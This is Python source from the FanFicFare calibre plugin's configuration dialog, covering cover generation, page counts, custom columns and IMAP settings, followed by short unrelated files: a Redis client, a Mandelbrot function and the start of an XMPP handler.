self.addtoreadlists.setChecked(prefs['addtoreadlists'])
self.l.addWidget(self.addtoreadlists)
horz = QHBoxLayout()
label = QLabel(_('"To Read" Reading Lists'))
label.setToolTip(_("When enabled, new/updated stories will be automatically added to these lists."))
horz.addWidget(label)
self.read_lists_box = EditWithComplete(self)
self.read_lists_box.setToolTip(_("When enabled, new/updated stories will be automatically added to these lists."))
self.read_lists_box.update_items_cache(reading_lists)
self.read_lists_box.setText(prefs['read_lists'])
horz.addWidget(self.read_lists_box)
self.read_lists_box.setCursorPosition(0)
self.l.addLayout(horz)
self.addtolistsonread = QCheckBox(_('Add stories back to "Send to Device" Reading List(s) when marked "Read".'),self)
self.addtolistsonread.setToolTip(_('Menu option to remove from "To Read" lists will also add stories back to "Send to Device" Reading List(s)'))
self.addtolistsonread.setChecked(prefs['addtolistsonread'])
self.l.addWidget(self.addtolistsonread)
self.autounnew = QCheckBox(_('Automatically run Remove "New" Chapter Marks when marking books "Read".'),self)
self.autounnew.setToolTip(_('Menu option to remove from "To Read" lists will also remove "(new)" chapter marks created by personal.ini <i>mark_new_chapters</i> setting.'))
self.autounnew.setChecked(prefs['autounnew'])
self.l.addWidget(self.autounnew)
self.l.insertStretch(-1)
class CalibreCoverTab(QWidget):
def __init__(self, parent_dialog, plugin_action):
self.parent_dialog = parent_dialog
self.plugin_action = plugin_action
QWidget.__init__(self)
self.gencov_elements=[] ## used to disable/enable when gen
## cover is off/on. This is more
## about being a visual cue than real
## necessary function.
topl = self.l = QVBoxLayout()
self.setLayout(self.l)
try:
gc_plugin = plugin_action.gui.iactions['Generate Cover']
gc_settings = gc_plugin.get_saved_setting_names()
except KeyError:
gc_settings= []
label = QLabel(_("The Calibre cover image for a downloaded book can come"
" from the story site(if EPUB and images are enabled), or"
" from either Calibre's built-in random cover generator or"
" the %(gc)s plugin.")%no_trans)
label.setWordWrap(True)
self.l.addWidget(label)
self.l.addSpacing(5)
tooltip = _("Update Calibre book cover image from EPUB when Calibre metadata is updated.\n"
"Doesn't go looking for new images on 'Update Calibre Metadata Only'.\n"
"Cover in EPUB could be from site or previously injected into the EPUB.\n"
"This comes before Generate Cover so %(gc)s(Plugin) use the image if configured to.")%no_trans
horz = QHBoxLayout()
label = QLabel(_('Update Calibre Cover (from EPUB):'))
label.setToolTip(tooltip)
horz.addWidget(label)
self.updatecalcover = QComboBox(self)
for i in updatecalcover_order:
self.updatecalcover.addItem(i)
# back compat. If has own value, use.
if prefs['updatecalcover']:
self.updatecalcover.setCurrentIndex(self.updatecalcover.findText(prefs_save_options[prefs['updatecalcover']]))
elif prefs['updatecover']: # doesn't have own val, set YES if old value set.
self.updatecalcover.setCurrentIndex(self.updatecalcover.findText(prefs_save_options[SAVE_YES]))
else: # doesn't have own value, old value not set, NO.
self.updatecalcover.setCurrentIndex(self.updatecalcover.findText(prefs_save_options[SAVE_NO]))
self.updatecalcover.setToolTip(tooltip)
label.setBuddy(self.updatecalcover)
horz.addWidget(self.updatecalcover)
self.l.addLayout(horz)
self.covernewonly = QCheckBox(_("Set Calibre Cover Only for New Books"),self)
self.covernewonly.setToolTip(_("Set the Calibre cover from EPUB only for new\nbooks, not updates to existing books."))
self.covernewonly.setChecked(prefs['covernewonly'])
horz = QHBoxLayout()
horz.addItem(QtGui.QSpacerItem(20, 1))
horz.addWidget(self.covernewonly)
self.l.addLayout(horz)
self.l.addSpacing(5)
tooltip = _("Generate a Calibre book cover image when Calibre metadata is updated.<br />"
"Note that %(gc)s(Plugin) will only run if there is a %(gc)s setting configured below for Default or the appropriate site.")%no_trans
horz = QHBoxLayout()
label = QLabel(_('Generate Calibre Cover:'))
label.setToolTip(tooltip)
horz.addWidget(label)
self.gencalcover = QComboBox(self)
for i in gencalcover_order:
self.gencalcover.addItem(i)
self.gencalcover.setCurrentIndex(self.gencalcover.findText(prefs_save_options[prefs['gencalcover']]))
self.gencalcover.setToolTip(tooltip)
label.setBuddy(self.gencalcover)
horz.addWidget(self.gencalcover)
self.l.addLayout(horz)
self.gencalcover.currentIndexChanged.connect(self.endisable_elements)
horz = QHBoxLayout()
horz.addItem(QtGui.QSpacerItem(20, 1))
vert = QVBoxLayout()
horz.addLayout(vert)
self.l.addLayout(horz)
self.gcnewonly = QCheckBox(_("Generate Covers Only for New Books")%no_trans,self)
self.gcnewonly.setToolTip(_("Default is to generate a cover any time the calibre metadata is"
" updated.<br />Used for both Calibre and Plugin generated covers."))
self.gcnewonly.setChecked(prefs['gcnewonly'])
vert.addWidget(self.gcnewonly)
self.gencov_elements.append(self.gcnewonly)
self.gc_polish_cover = QCheckBox(_("Inject/update the generated cover inside EPUB"),self)
self.gc_polish_cover.setToolTip(_("Calibre's Polish feature will be used to inject or update the generated"
" cover into the EPUB ebook file.<br />Used for both Calibre and Plugin generated covers."))
self.gc_polish_cover.setChecked(prefs['gc_polish_cover'])
vert.addWidget(self.gc_polish_cover)
self.gencov_elements.append(self.gc_polish_cover)
# can't be local or it's destroyed when __init__ is done and
# connected things don't fire.
self.gencov_rdgrp = QButtonGroup()
self.gencov_gb = QGroupBox()
horz = QHBoxLayout()
self.gencov_gb.setLayout(horz)
self.plugin_gen_cover = QRadioButton(_('Plugin %(gc)s')%no_trans,self)
self.plugin_gen_cover.setToolTip(_("Use the %(gc)s plugin to create covers.<br>"
"Requires that you have the the %(gc)s plugin installed.<br>"
"Additional settings are below."%no_trans))
self.gencov_rdgrp.addButton(self.plugin_gen_cover)
# always, new only, when no cover from site, inject yes/no...
self.plugin_gen_cover.setChecked(prefs['plugin_gen_cover'])
horz.addWidget(self.plugin_gen_cover)
self.gencov_elements.append(self.plugin_gen_cover)
self.calibre_gen_cover = QRadioButton(_('Calibre Generate Cover'),self)
self.calibre_gen_cover.setToolTip(_("Call Calibre's Edit Metadata Generate cover"
" feature to create a random cover each time"
" a story is downloaded or updated.<br />"
"Right click or long click the 'Generate cover'"
" button in Calibre's Edit Metadata to customize."))
self.gencov_rdgrp.addButton(self.calibre_gen_cover)
# always, new only, when no cover from site, inject yes/no...
self.calibre_gen_cover.setChecked(prefs['calibre_gen_cover'])
horz.addWidget(self.calibre_gen_cover)
self.gencov_elements.append(self.calibre_gen_cover)
#self.l.addLayout(horz)
self.l.addWidget(self.gencov_gb)
self.gcp_gb = QGroupBox(_("%(gc)s(Plugin) Settings")%no_trans)
topl.addWidget(self.gcp_gb)
self.l = QVBoxLayout()
self.gcp_gb.setLayout(self.l)
self.gencov_elements.append(self.gcp_gb)
self.gencov_rdgrp.buttonClicked.connect(self.endisable_elements)
label = QLabel(_('The %(gc)s plugin can create cover images for books using various metadata (including existing cover image). If you have %(gc)s installed, FanFicFare can run %(gc)s on new downloads and metadata updates. Pick a %(gc)s setting by site and/or one to use by Default.')%no_trans)
label.setWordWrap(True)
self.l.addWidget(label)
self.l.addSpacing(5)
scrollable = QScrollArea()
scrollcontent = QWidget()
scrollable.setWidget(scrollcontent)
scrollable.setWidgetResizable(True)
self.l.addWidget(scrollable)
self.sl = QVBoxLayout()
scrollcontent.setLayout(self.sl)
self.gc_dropdowns = {}
sitelist = getSiteSections()
sitelist.sort()
sitelist.insert(0,_("Default"))
for site in sitelist:
horz = QHBoxLayout()
label = QLabel(site)
if site == _("Default"):
s = _("On Metadata update, run %(gc)s with this setting, if there isn't a more specific setting below.")%no_trans
else:
no_trans['site']=site # not ideal, but, meh.
s = _("On Metadata update, run %(gc)s with this setting for %(site)s stories.")%no_trans
label.setToolTip(s)
horz.addWidget(label)
dropdown = QComboBox(self)
dropdown.setToolTip(s)
dropdown.addItem('','none')
for setting in gc_settings:
dropdown.addItem(setting,setting)
if site == _("Default"):
self.gc_dropdowns["Default"] = dropdown
if 'Default' in prefs['gc_site_settings']:
dropdown.setCurrentIndex(dropdown.findData(prefs['gc_site_settings']['Default']))
else:
self.gc_dropdowns[site] = dropdown
if site in prefs['gc_site_settings']:
dropdown.setCurrentIndex(dropdown.findData(prefs['gc_site_settings'][site]))
horz.addWidget(dropdown)
self.sl.addLayout(horz)
self.sl.insertStretch(-1)
self.allow_gc_from_ini = QCheckBox(_('Allow %(gcset)s from %(pini)s to override')%no_trans,self)
self.allow_gc_from_ini.setToolTip(_("The %(pini)s parameter %(gcset)s allows you to choose a %(gc)s setting based on metadata"
" rather than site, but it's much more complex.<br />%(gcset)s is ignored when this is off.")%no_trans)
self.allow_gc_from_ini.setChecked(prefs['allow_gc_from_ini'])
self.l.addWidget(self.allow_gc_from_ini)
# keep at end.
self.endisable_elements()
def endisable_elements(self,button=None):
"Clearing house function for setting elements of Calibre"
"Cover tab enabled/disabled depending on all factors."
## First, cover gen on/off
for e in self.gencov_elements:
e.setEnabled(prefs_save_options[unicode(self.gencalcover.currentText())] != SAVE_NO)
# next, disable plugin settings when using calibre gen cov.
if not self.plugin_gen_cover.isChecked():
self.gcp_gb.setEnabled(False)
# disable (but not enable) unsupported options.
if not HAS_CALGC:
self.calibre_gen_cover.setEnabled(False)
if not 'Generate Cover' in self.plugin_action.gui.iactions:
self.plugin_gen_cover.setEnabled(False)
self.gcp_gb.setEnabled(False)
class CountPagesTab(QWidget):
def __init__(self, parent_dialog, plugin_action):
self.parent_dialog = parent_dialog
self.plugin_action = plugin_action
QWidget.__init__(self)
self.l = QVBoxLayout()
self.setLayout(self.l)
label = QLabel(_('These settings provide integration with the %(cp)s Plugin. %(cp)s can automatically update custom columns with page, word and reading level statistics. You have to create and configure the columns in %(cp)s first.')%no_trans)
label.setWordWrap(True)
self.l.addWidget(label)
self.l.addSpacing(5)
label = QLabel(_('If any of the settings below are checked, when stories are added or updated, the %(cp)s Plugin will be called to update the checked statistics.')%no_trans)
label.setWordWrap(True)
self.l.addWidget(label)
self.l.addSpacing(5)
# the same for all settings. Mostly.
tooltip = _('Which column and algorithm to use are configured in %(cp)s.')%no_trans
# 'PageCount', 'WordCount', 'FleschReading', 'FleschGrade', 'GunningFog'
self.pagecount = QCheckBox('Page Count',self)
self.pagecount.setToolTip(tooltip)
self.pagecount.setChecked('PageCount' in prefs['countpagesstats'])
self.l.addWidget(self.pagecount)
horz = QHBoxLayout()
self.wordcount = QCheckBox('Word Count',self)
self.wordcount.setToolTip(tooltip+"\n"+_('Will overwrite word count from FanFicFare metadata if set to update the same custom column.'))
self.wordcount.setChecked('WordCount' in prefs['countpagesstats'])
horz.addWidget(self.wordcount)
self.wordcountmissing = QCheckBox('Only if Word Count is Missing in FanFicFare Metadata',self)
self.wordcountmissing.setToolTip(_("Only run Count Page's Word Count if checked <i>and</i> FanFicFare metadata doesn't already have a word count. If this is used with one of the other Page Counts, the Page Count plugin will be called twice."))
self.wordcountmissing.setChecked(prefs['wordcountmissing'])
self.wordcountmissing.setEnabled(self.wordcount.isChecked())
horz.addWidget(self.wordcountmissing)
self.wordcount.stateChanged.connect(lambda x : self.wordcountmissing.setEnabled(self.wordcount.isChecked()))
self.l.addLayout(horz)
self.fleschreading = QCheckBox('Flesch Reading Ease',self)
self.fleschreading.setToolTip(tooltip)
self.fleschreading.setChecked('FleschReading' in prefs['countpagesstats'])
self.l.addWidget(self.fleschreading)
self.fleschgrade = QCheckBox('Flesch-Kincaid Grade Level',self)
self.fleschgrade.setToolTip(tooltip)
self.fleschgrade.setChecked('FleschGrade' in prefs['countpagesstats'])
self.l.addWidget(self.fleschgrade)
self.gunningfog = QCheckBox('Gunning Fog Index',self)
self.gunningfog.setToolTip(tooltip)
self.gunningfog.setChecked('GunningFog' in prefs['countpagesstats'])
self.l.addWidget(self.gunningfog)
self.l.insertStretch(-1)
class OtherTab(QWidget):
def __init__(self, parent_dialog, plugin_action):
self.parent_dialog = parent_dialog
self.plugin_action = plugin_action
QWidget.__init__(self)
self.l = QVBoxLayout()
self.setLayout(self.l)
label = QLabel(_("These controls aren't plugin settings as such, but convenience buttons for setting Keyboard shortcuts and getting all the FanFicFare confirmation dialogs back again."))
label.setWordWrap(True)
self.l.addWidget(label)
self.l.addSpacing(5)
keyboard_shortcuts_button = QPushButton(_('Keyboard shortcuts...'), self)
keyboard_shortcuts_button.setToolTip(_('Edit the keyboard shortcuts associated with this plugin'))
keyboard_shortcuts_button.clicked.connect(parent_dialog.edit_shortcuts)
self.l.addWidget(keyboard_shortcuts_button)
reset_confirmation_button = QPushButton(_('Reset disabled &confirmation dialogs'), self)
reset_confirmation_button.setToolTip(_('Reset all show me again dialogs for the FanFicFare plugin'))
reset_confirmation_button.clicked.connect(self.reset_dialogs)
self.l.addWidget(reset_confirmation_button)
view_prefs_button = QPushButton(_('&View library preferences...'), self)
view_prefs_button.setToolTip(_('View data stored in the library database for this plugin'))
view_prefs_button.clicked.connect(self.view_prefs)
self.l.addWidget(view_prefs_button)
self.l.insertStretch(-1)
def reset_dialogs(self):
for key in dynamic.keys():
if key.startswith('fff_') and dynamic[key] is False:
dynamic[key] = True
info_dialog(self, _('Done'),
_('Confirmation dialogs have all been reset'),
show=True,
show_copy_button=False)
def view_prefs(self):
d = PrefsViewerDialog(self.plugin_action.gui, PREFS_NAMESPACE)
d.exec_()
permitted_values = {
'int' : ['numWords','numChapters'],
'float' : ['numWords','numChapters'],
'bool' : ['status-C','status-I'],
'datetime' : ['datePublished', 'dateUpdated', 'dateCreated'],
'series' : ['series'],
'enumeration' : ['category',
'genre',
'language',
'series',
'characters',
'ships',
'status',
'datePublished',
'dateUpdated',
'dateCreated',
'rating',
'warnings',
'numChapters',
'numWords',
'site',
'publisher',
'storyId',
'authorId',
'extratags',
'title',
'storyUrl',
'description',
'author',
'authorUrl',
'formatname',
'version'
#,'formatext' # not useful information.
#,'siteabbrev'
]
}
# no point copying the whole list.
permitted_values['text'] = permitted_values['enumeration']
permitted_values['comments'] = permitted_values['enumeration']
titleLabels = {
'category':_('Category'),
'genre':_('Genre'),
'language':_('Language'),
'status':_('Status'),
'status-C':_('Status:%(cmplt)s')%no_trans,
'status-I':_('Status:%(inprog)s')%no_trans,
'series':_('Series'),
'characters':_('Characters'),
'ships':_('Relationships'),
'datePublished':_('Published'),
'dateUpdated':_('Updated'),
'dateCreated':_('Created'),
'rating':_('Rating'),
'warnings':_('Warnings'),
'numChapters':_('Chapters'),
'numWords':_('Words'),
'site':_('Site'),
'publisher':_('Publisher'),
'storyId':_('Story ID'),
'authorId':_('Author ID'),
'extratags':_('Extra Tags'),
'title':_('Title'),
'storyUrl':_('Story URL'),
'description':_('Description'),
'author':_('Author'),
'authorUrl':_('Author URL'),
'formatname':_('File Format'),
'formatext':_('File Extension'),
'siteabbrev':_('Site Abbrev'),
'version':_('FanFicFare Version')
}
class CustomColumnsTab(QWidget):
def __init__(self, parent_dialog, plugin_action):
self.parent_dialog = parent_dialog
self.plugin_action = plugin_action
QWidget.__init__(self)
## sort by visible Column Name (vs #name)
custom_columns = sorted(self.plugin_action.gui.library_view.model().custom_columns.items(), key=lambda x: x[1]['name'])
self.l = QVBoxLayout()
self.setLayout(self.l)
label = QLabel(_("If you have custom columns defined, they will be listed below. Choose a metadata value type to fill your columns automatically."))
label.setWordWrap(True)
self.l.addWidget(label)
self.l.addSpacing(5)
self.custcol_dropdowns = {}
self.custcol_newonlycheck = {}
scrollable = QScrollArea()
scrollcontent = QWidget()
scrollable.setWidget(scrollcontent)
scrollable.setWidgetResizable(True)
self.l.addWidget(scrollable)
self.sl = QVBoxLayout()
scrollcontent.setLayout(self.sl)
for key, column in custom_columns:
if column['datatype'] in permitted_values:
# print("\n============== %s ===========\n"%key)
# for (k,v) in column.iteritems():
# print("column['%s'] => %s"%(k,v))
horz = QHBoxLayout()
# label = QLabel(column['name'])
label = QLabel('%s(%s)'%(column['name'],key))
label.setToolTip(_("Update this %s column(%s) with...")%(key,column['datatype']))
horz.addWidget(label)
dropdown = QComboBox(self)
dropdown.addItem('','none')
for md in permitted_values[column['datatype']]:
dropdown.addItem(titleLabels[md],md)
self.custcol_dropdowns[key] = dropdown
if key in prefs['custom_cols']:
dropdown.setCurrentIndex(dropdown.findData(prefs['custom_cols'][key]))
if column['datatype'] == 'enumeration':
dropdown.setToolTip(_("Metadata values valid for this type of column.")+"\n"+_("Values that aren't valid for this enumeration column will be ignored."))
else:
dropdown.setToolTip(_("Metadata values valid for this type of column."))
horz.addWidget(dropdown)
newonlycheck = QCheckBox(_("New Only"),self)
newonlycheck.setToolTip(_("Write to %s(%s) only for new\nbooks, not updates to existing books.")%(column['name'],key))
self.custcol_newonlycheck[key] = newonlycheck
if key in prefs['custom_cols_newonly']:
newonlycheck.setChecked(prefs['custom_cols_newonly'][key])
horz.addWidget(newonlycheck)
self.sl.addLayout(horz)
self.sl.insertStretch(-1)
self.l.addSpacing(5)
self.allow_custcol_from_ini = QCheckBox(_('Allow %(ccset)s from %(pini)s to override')%no_trans,self)
self.allow_custcol_from_ini.setToolTip(_("The %(pini)s parameter %(ccset)s allows you to set custom columns to site specific values that aren't common to all sites.<br />%(ccset)s is ignored when this is off.")%no_trans)
self.allow_custcol_from_ini.setChecked(prefs['allow_custcol_from_ini'])
self.l.addWidget(self.allow_custcol_from_ini)
label = QLabel(_("Special column:"))
label.setWordWrap(True)
self.l.addWidget(label)
horz = QHBoxLayout()
label = QLabel(_("Update/Overwrite Error Column:"))
tooltip=_("When an update or overwrite of an existing story fails, record the reason in this column.\n(Text and Long Text columns only.)")
label.setToolTip(tooltip)
horz.addWidget(label)
self.errorcol = QComboBox(self)
self.errorcol.setToolTip(tooltip)
self.errorcol.addItem('','none')
for key, column in custom_columns:
if column['datatype'] in ('text','comments'):
self.errorcol.addItem(column['name'],key)
self.errorcol.setCurrentIndex(self.errorcol.findData(prefs['errorcol']))
horz.addWidget(self.errorcol)
self.save_all_errors = QCheckBox(_('Save All Errors'),self)
self.save_all_errors.setToolTip(_('If unchecked, these errors will not be saved: %s')%(
'\n'+
'\n'.join((_("Not Overwriting, web site is not newer."),
_("Already contains %d chapters.").replace('%d','X')))))
self.save_all_errors.setChecked(prefs['save_all_errors'])
horz.addWidget(self.save_all_errors)
self.l.addLayout(horz)
horz = QHBoxLayout()
label = QLabel(_("Saved Metadata Column:"))
tooltip=_("If set, FanFicFare will save a copy of all its metadata in this column when the book is downloaded or updated.<br/>The metadata from this column can later be used to update custom columns without having to request the metadata from the server again.<br/>(Long Text columns only.)")
label.setToolTip(tooltip)
horz.addWidget(label)
self.savemetacol = QComboBox(self)
self.savemetacol.setToolTip(tooltip)
self.savemetacol.addItem('','')
for key, column in custom_columns:
if column['datatype'] in ('comments'):
self.savemetacol.addItem(column['name'],key)
self.savemetacol.setCurrentIndex(self.savemetacol.findData(prefs['savemetacol']))
horz.addWidget(self.savemetacol)
label = QLabel('')
horz.addWidget(label) # empty spacer for alignment with error column line.
self.l.addLayout(horz)
horz = QHBoxLayout()
label = QLabel(_("Last Checked Column:"))
tooltip=_("Record the last time FanFicFare updated or checked for updates.\n(Date columns only.)")
label.setToolTip(tooltip)
horz.addWidget(label)
self.lastcheckedcol = QComboBox(self)
self.lastcheckedcol.setToolTip(tooltip)
self.lastcheckedcol.addItem('','none')
## sort by visible Column Name (vs #name)
for key, column in custom_columns:
if column['datatype'] == 'datetime':
self.lastcheckedcol.addItem(column['name'],key)
self.lastcheckedcol.setCurrentIndex(self.lastcheckedcol.findData(prefs['lastcheckedcol']))
horz.addWidget(self.lastcheckedcol)
label = QLabel('')
horz.addWidget(label) # empty spacer for alignment with error column line.
self.l.addLayout(horz)
class StandardColumnsTab(QWidget):
def __init__(self, parent_dialog, plugin_action):
self.parent_dialog = parent_dialog
self.plugin_action = plugin_action
QWidget.__init__(self)
columns=OrderedDict()
columns["title"]=_("Title")
columns["authors"]=_("Author(s)")
columns["publisher"]=_("Publisher")
columns["tags"]=_("Tags")
columns["languages"]=_("Languages")
columns["pubdate"]=_("Published Date")
columns["timestamp"]=_("Date")
columns["comments"]=_("Comments")
columns["series"]=_("Series")
columns["identifiers"]=_("Ids(url id only)")
self.l = QVBoxLayout()
self.setLayout(self.l)
label = QLabel(_("The standard calibre metadata columns are listed below. You may choose whether FanFicFare will fill each column automatically on updates or only for new books."))
label.setWordWrap(True)
self.l.addWidget(label)
self.l.addSpacing(5)
self.stdcol_newonlycheck = {}
rows=[]
for key, column in six.iteritems(columns):
row = []
rows.append(row)
label = QLabel(column)
#label.setToolTip("Update this %s column(%s) with..."%(key,column['datatype']))
row.append(label)
newonlycheck = QCheckBox(_("New Only"),self)
newonlycheck.setToolTip(_("Write to %s only for new\nbooks, not updates to existing books.")%column)
self.stdcol_newonlycheck[key] = newonlycheck
if key in prefs['std_cols_newonly']:
newonlycheck.setChecked(prefs['std_cols_newonly'][key])
row.append(newonlycheck)
if key == 'title':
self.suppresstitlesort = QCheckBox(_('Force Title into Title Sort?'),self)
self.suppresstitlesort.setToolTip(_("If checked, the title as given will be used for the Title Sort, too.\nIf not checked, calibre will apply it's built in algorithm which makes 'The Title' sort as 'Title, The', etc."))
self.suppresstitlesort.setChecked(prefs['suppresstitlesort'])
row.append(self.suppresstitlesort)
self.titlecase = QCheckBox(_('Fix Title Case?'),self)
self.titlecase.setToolTip(_("If checked, Calibre's routine for correcting the capitalization of title will be applied.")
+"\n"+_("This effects Calibre metadata only, not FanFicFare metadata in title page."))
self.titlecase.setChecked(prefs['titlecase'])
row.append(self.titlecase)
elif key == 'authors':
self.set_author_url = QCheckBox(_('Set Calibre Author URL'),self)
self.set_author_url.setToolTip(_("Set Calibre Author URL to Author's URL on story site."))
self.set_author_url.setChecked(prefs['set_author_url'])
row.append(self.set_author_url)
self.suppressauthorsort = QCheckBox(_('Force Author into Author Sort?'),self)
self.suppressauthorsort.setToolTip(_("If checked, the author(s) as given will be used for the Author Sort, too.\nIf not checked, calibre will apply it's built in algorithm which makes 'Bob Smith' sort as 'Smith, Bob', etc."))
self.suppressauthorsort.setChecked(prefs['suppressauthorsort'])
row.append(self.suppressauthorsort)
self.authorcase = QCheckBox(_('Fix Author Case?'),self)
self.authorcase.setToolTip(_("If checked, Calibre's routine for correcting the capitalization of author names will be applied.")
+"\n"+_("Calibre remembers all authors in the library; changing the author case on one book will effect all books by that author.")
+"\n"+_("This effects Calibre metadata only, not FanFicFare metadata in title page."))
self.authorcase.setChecked(prefs['authorcase'])
row.append(self.authorcase)
elif key == 'series':
self.set_series_url = QCheckBox(_('Set Calibre Series URL'),self)
self.set_series_url.setToolTip(_("Set Calibre Series URL to Series's URL on story site."))
self.set_series_url.setChecked(prefs['set_series_url'])
row.append(self.set_series_url)
self.setanthologyseries = QCheckBox(_("Set 'Series [0]' for New Anthologies?"),self)
self.setanthologyseries.setToolTip(_("If checked, the Series column will be set to 'Series Name [0]' when an Anthology for a series is first created."))
self.setanthologyseries.setChecked(prefs['setanthologyseries'])
row.append(self.setanthologyseries)
grid = QGridLayout()
for rownum, row in enumerate(rows):
for colnum, col in enumerate(row):
grid.addWidget(col,rownum,colnum)
self.l.addLayout(grid)
self.l.addSpacing(5)
label = QLabel(_("Other Standard Column Options"))
label.setWordWrap(True)
self.l.addWidget(label)
self.l.addSpacing(5)
self.includecomments = QCheckBox(_("Include Books' Comments in Anthology Comments?"),self)
self.includecomments.setToolTip(_('''Include all the merged books' comments in the new book's comments.
Default is a list of included titles only.'''))
self.includecomments.setChecked(prefs['includecomments'])
self.l.addWidget(self.includecomments)
self.anth_comments_newonly = QCheckBox(_("Set Anthology Comments only for new books"),self)
self.anth_comments_newonly.setToolTip(_("Comments will only be set for New Anthologies, not updates.\nThat way comments you set manually are retained."))
self.anth_comments_newonly.setChecked(prefs['anth_comments_newonly'])
self.l.addWidget(self.anth_comments_newonly)
self.l.insertStretch(-1)
class ImapTab(QWidget):
def __init__(self, parent_dialog, plugin_action):
self.parent_dialog = parent_dialog
self.plugin_action = plugin_action
QWidget.__init__(self)
self.l = QGridLayout()
self.setLayout(self.l)
row=0
label = QLabel(_('These settings will allow FanFicFare to fetch story URLs from your email account. It will only look for story URLs in unread emails in the folder specified below.'))
label.setWordWrap(True)
self.l.addWidget(label,row,0,1,-1)
row+=1
label = QLabel(_('IMAP Server Name'))
tooltip = _("Name of IMAP server--must allow IMAP4 with SSL. Eg: imap.gmail.com")
label.setToolTip(tooltip)
self.l.addWidget(label,row,0)
self.imapserver = QLineEdit(self)
self.imapserver.setToolTip(tooltip)
self.imapserver.setText(prefs['imapserver'])
self.l.addWidget(self.imapserver,row,1)
row+=1
label = QLabel(_('IMAP User Name'))
tooltip = _("Name of IMAP user. Eg: yourname@gmail.com\nNote that Gmail accounts need to have IMAP enabled in Gmail Settings first.")
label.setToolTip(tooltip)
self.l.addWidget(label,row,0)
self.imapuser = QLineEdit(self)
self.imapuser.setToolTip(tooltip)
self.imapuser.setText(prefs['imapuser'])
self.l.addWidget(self.imapuser,row,1)
row+=1
label = QLabel(_('IMAP User Password'))
tooltip = _("IMAP password. If left empty, FanFicFare will ask you for your password when you use the feature.")
label.setToolTip(tooltip)
self.l.addWidget(label,row,0)
self.imappass = QLineEdit(self)
self.imappass.setToolTip(tooltip)
self.imappass.setEchoMode(QLineEdit.Password)
self.imappass.setText(prefs['imappass'])
self.l.addWidget(self.imappass,row,1)
row+=1
self.imapsessionpass = QCheckBox(_('Remember Password for Session (when not saved above)'),self)
self.imapsessionpass.setToolTip(_('If checked, and no password is entered above, FanFicFare will remember your password until you close calibre or change Libraries.'))
self.imapsessionpass.setChecked(prefs['imapsessionpass'])
self.l.addWidget(self.imapsessionpass,row,0,1,-1)
row+=1
label = QLabel(_('IMAP Folder Name'))
tooltip = _("Name of IMAP folder to search for new emails. The folder (or label) has to already exist. Use INBOX for your default inbox.")
label.setToolTip(tooltip)
self.l.addWidget(label,row,0)
self.imapfolder = QLineEdit(self)
self.imapfolder.setToolTip(tooltip)
self.imapfolder.setText(prefs['imapfolder'])
self.l.addWidget(self.imapfolder,row,1)
row+=1
self.imapmarkread = QCheckBox(_('Mark Emails Read'),self)
self.imapmarkread.setToolTip(_('If checked, emails will be marked as having been read if they contain any story URLs.'))
self.imapmarkread.setChecked(prefs['imapmarkread'])
self.l.addWidget(self.imapmarkread,row,0,1,-1)
row+=1
self.auto_reject_from_email = QCheckBox(_('Discard URLs on Reject List'),self)
self.auto_reject_from_email.setToolTip(_('If checked, FanFicFare will silently discard story URLs from emails that are on your Reject URL List.<br>Otherwise they will appear and you will see the normal Reject URL dialog.<br>The Emails will still be marked Read if configured to.'))
self.auto_reject_from_email.setChecked(prefs['auto_reject_from_email'])
self.l.addWidget(self.auto_reject_from_email,row,0,1,-1)
row+=1
self.update_existing_only_from_email = QCheckBox(_('Update Existing Books Only'),self)
self.update_existing_only_from_email.setToolTip(_('If checked, FanFicFare will silently discard story URLs from emails that are not already in your library.<br>Otherwise all story URLs, new and existing, will be used.<br>The Emails will still be marked Read if configured to.'))
self.update_existing_only_from_email.setChecked(prefs['update_existing_only_from_email'])
self.l.addWidget(self.update_existing_only_from_email,row,0,1,-1)
row+=1
self.download_from_email_immediately = QCheckBox(_('Download from Email Immediately'),self)
self.download_from_email_immediately.setToolTip(_('If checked, FanFicFare will start downloading story URLs from emails immediately.<br>Otherwise the usual Download from URLs dialog will appear.'))
self.download_from_email_immediately.setChecked(prefs['download_from_email_immediately'])
self.l.addWidget(self.download_from_email_immediately,row,0,1,-1)
row+=1
label = QLabel(_('Add these Tag(s) Automatically'))
tooltip = ( _("Tags entered here will be automatically added to stories downloaded from email story URLs.") +"\n"+
_("Any additional stories you then manually add to the Story URL dialog will also have these tags added.") )
label.setToolTip(tooltip)
self.l.addWidget(label,row,0)
self.imaptags = EditWithComplete(self) # QLineEdit(self)
self.imaptags.update_items_cache(self.plugin_action.gui.current_db.all_tags())
self.imaptags.setToolTip(tooltip)
self.imaptags.setText(prefs['imaptags'])
self.imaptags.setCursorPosition(0)
self.l.addWidget(self.imaptags,row,1)
row+=1
label = QLabel(_("<b>It's safest if you create a separate email account that you use only "
"for your story update notices. FanFicFare and calibre cannot guarantee that "
"malicious code cannot get your email password once you've entered it. "
"<br>Use this feature at your own risk. </b>"))
label.setWordWrap(True)
self.l.addWidget(label,row,0,1,-1,Qt.AlignTop)
self.l.setRowStretch(row,1)
row+=1
| JimmXinu/FanFicFare | calibre-plugin/config.py | config.py | py | 85,977 | python | en | code | 664 | github-code | 36 |
27278263299 | import redis
class RedisClient:
def __init__(self):
self.client = redis.Redis(
host='127.0.0.1',
port=6379,
db=0
)
def db_health(self):
if self.client.ping():
print("PONG")
else:
print("Connection failed to db")
| kliu2python/allsee | utils/redis_client.py | redis_client.py | py | 315 | python | en | code | 0 | github-code | 36 |
5514686481 | import numpy as np
def create_mandelbrot(size, maxiter):
"""
Create a mandelbrot set covering the given rectangle.
The rectangle is defined by the characters x1, y1, x2, y2, where
(x1, y1) are the coordinates of the top-left corner, and (x2, y2)
are the coordinates of the bottom-right corner.
The mandelbrot set is defined by the equation z_n = z_{n-1}**2 + c,
where c is a constant.
"""
x1, y1, x2, y2 = size
dx = float(x2 - x1) / maxiter
dy = float(y2 - y1) / maxiter
x, y = np.mgrid[x1:x2 + dx:dx, y1:y2 + dy:dy]
c = x + y * 1j
z = np.zeros_like(c, dtype=np.complex128)
for i in range(maxiter):
z = z ** 2 + c
return z
| copilot-deboches/algoritimos | python/mandelbrot_set.py | mandelbrot_set.py | py | 699 | python | en | code | 0 | github-code | 36 |
70811192105 | #!/usr/bin/env python2
# vim:fileencoding=utf-8
import logging
import datetime
from google.appengine.api import xmpp
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.api import taskqueue
import gaetalk
import config
import utils
class XMPPSub(webapp.RequestHandler):
'''被人加好友了~可能被触发多次'''
def post(self):
jid = self.request.get('from')
gaetalk.try_add_user(jid)
class XMPPUnsub(webapp.RequestHandler):
def post(self):
